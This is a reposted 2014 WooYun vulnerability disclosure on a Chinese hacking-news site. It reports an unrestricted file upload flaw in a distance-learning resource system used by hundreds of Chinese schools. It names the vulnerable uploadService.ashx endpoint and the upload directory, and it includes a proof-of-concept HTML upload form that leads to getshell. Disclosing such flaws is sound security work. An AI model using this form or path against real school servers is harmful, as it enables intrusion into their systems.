记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

某通用型学习系统前台无限制Getshell(影响数百所学校)

2014-11-10 23:45

详细说明:

0x00.

由中央广播电视大学现代远程教育开发的一套资源中心系统存在任意文件上传漏洞,可上传任意文件导致代码执行,影响全国所有分中心,几百所以上的学校。貌似主管是国家数字化学习资源中心。几乎涵盖全国所有省!!!

可以直接Getshell,危害太大了。



厂商:

code 区域
http://nerc.edu.cn/FrontEnd/default.html 国家数字化学习资源中心

技术支持是由:中央广播电视大学现代远程教育资源中心



浏览器无法完全展现所有案例,影响全国几乎所有省分中心的学习资源系统

01.jpg



谷歌对该系统的收入达到500万多条:

02.jpg



漏洞证明:

漏洞证明:

以下为漏洞报告,非利用方式,请不要恶意利用破坏,否则后果自负!漏洞在国家互联网应急中心处置后将进行打码处理。

0x01.

“uploadService.ashx”对上传的文件没有做任何判断导致用户可以上传任意文件。本地构造上传表单,上传后文件将存储在“FrontEnd\Uploads\Course\”目录下。



code 区域
<form action="http://****.***.**.cn/admin/course/courseService/uploadService.ashx?guid=&imgtype=" method="post" enctype="multipart/form-data" name="form1">

<input type="file" name="fileUp">

<input type="submit" name="Submit" value="upload">

</form>



上传后会返回文件名:

03.jpg



03.jpg





修复方案:

05.jpg



建议国家互联网通报教育部?请给个处置回复ok?另外20rank可好?

知识来源: www.wooyun.org/bugs/wooyun-2014-071974

阅读:82848 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“某通用型学习系统前台无限制Getshell(影响数百所学校)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云